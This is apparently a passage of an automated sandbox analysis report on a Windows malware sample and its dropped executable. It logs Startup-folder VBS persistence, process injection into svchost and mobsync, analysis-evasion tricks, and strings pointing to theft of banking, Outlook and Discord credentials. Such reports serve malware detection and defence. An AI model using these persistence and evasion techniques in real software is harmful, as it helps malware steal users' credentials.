                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: 25Lz840Dmh.exeStatic file information: File size 1169920 > 1048576
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 25Lz840Dmh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHSqcaLVnKQk.exe, 0000000E.00000002.2539118267.00000000002EE000.00000002.00000001.01000000.00000008.sdmp, LHSqcaLVnKQk.exe, 00000012.00000002.2539220837.00000000002EE000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: 25Lz840Dmh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: 25Lz840Dmh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: 25Lz840Dmh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: 25Lz840Dmh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: 25Lz840Dmh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF4B37 LoadLibraryA,GetProcAddress,5_2_00BF4B37
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC4E0 push cs; ret 5_2_00BFC526
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC732 push ss; ret 5_2_00BFC735
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC730 push ss; ret 5_2_00BFC731
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC89E push ds; ret 5_2_00BFC8A1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC88A push ss; ret 5_2_00BFC899
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC888 push ds; ret 5_2_00BFC889
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC883 push ds; ret 5_2_00BFC885
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC87B push ds; ret 5_2_00BFC881
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC877 push ds; ret 5_2_00BFC879
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFC867 push ds; ret 5_2_00BFC86D
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C18945 push ecx; ret 5_2_00C18958
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C30BDD push es; ret 5_2_00C30BE0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C30BE1 push es; ret 5_2_00C30BE4
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C30BBE push es; ret 5_2_00C30BDC
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000FC4FE push A3000FBAh; retn 000Fh7_2_000FC50D
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00118945 push ecx; ret 7_2_00118958
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041E9A4 push ecx; retf 9_2_0041E9A5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00411B63 push es; iretd 9_2_00411B64
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00418C73 push ecx; iretd 9_2_00418C7A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041EC7E push cs; iretd 9_2_0041EC7F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00407C3D pushad ; retf 9_2_00407C48
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004034C0 push eax; ret 9_2_004034C2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00418EE6 push es; iretd 9_2_00418EE7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D7D7 push eax; ret 9_2_0040D7DC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040879B push 00000062h; retf 9_2_004087A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0330225F pushad ; ret 9_2_033027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033027FA pushad ; ret 9_2_033027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033309AD push ecx; mov dword ptr [esp], ecx9_2_033309B6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0330283D push eax; iretd 9_2_03302858
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeFile created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbsJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BF48D7
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C75376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00C75376
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_000F48D7
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00175376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00175376
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C13187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00C13187
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeAPI/Special instruction interceptor: Address: 2EA3294
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeAPI/Special instruction interceptor: Address: 1883294
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337096E rdtsc 9_2_0337096E
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000F96E0 sldt word ptr [esp+esi*8]7_2_000F96E0
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 9787Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-106728
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeAPI coverage: 4.7 %
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeAPI coverage: 5.1 %
                    Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260Thread sleep count: 183 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260Thread sleep time: -366000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260Thread sleep count: 9787 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260Thread sleep time: -19574000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C5445A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5C6D1 FindFirstFileW,FindClose,5_2_00C5C6D1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C5C75C
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5EF95
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5F0F2
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5F3F3
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C537EF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C53B12
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5BCBC
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015445A GetFileAttributesW,FindFirstFileW,FindClose,7_2_0015445A
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015C6D1 FindFirstFileW,FindClose,7_2_0015C6D1
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0015C75C
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015EF95
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015F0F2
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015F3F3
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_001537EF
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00153B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00153B12
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015BCBC
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BF49A0
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: w2-0G0-7.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: w2-0G0-7.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: w2-0G0-7.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003118000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/%
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: w2-0G0-7.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: w2-0G0-7.15.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542163733.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                    Source: w2-0G0-7.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: w2-0G0-7.15.drBinary or memory string: discord.comVMware20,11696492231f
